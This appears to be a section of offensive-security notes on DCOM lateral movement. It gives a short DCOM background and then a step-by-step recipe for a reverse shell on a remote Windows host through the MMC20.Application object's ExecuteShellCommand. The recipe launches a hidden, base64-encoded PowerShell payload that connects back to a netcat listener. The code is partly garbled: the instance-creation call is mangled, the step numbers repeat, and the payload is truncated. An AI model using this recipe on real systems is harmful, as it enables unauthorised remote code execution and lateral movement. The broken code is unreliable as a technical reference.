6. DCOM

• Distributed Component Object Model
• Originally a system for creating software components that interact with each other
• Now extended for interaction between computers over a network
• Performed over RPC on TCP port 135
• Requires local administrator access
• Collection of DCOM lateral movement techniques: https://www.cybereason.com/blog/dcom-lateral-movement-techniques

DCOM MMC Reverse Shell:

1. Generate encoded Powershell payload using python script.
2. Start elevated powershell.
3. Initiate MMC 2.0 application and set target ip:

$dcom = [System.Activator]::CreateInstanceGetTypeFromProgID("MMC20.Application.1","<target-ip>")

2. Start netcat listener.
3. Execute the application and specify process:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")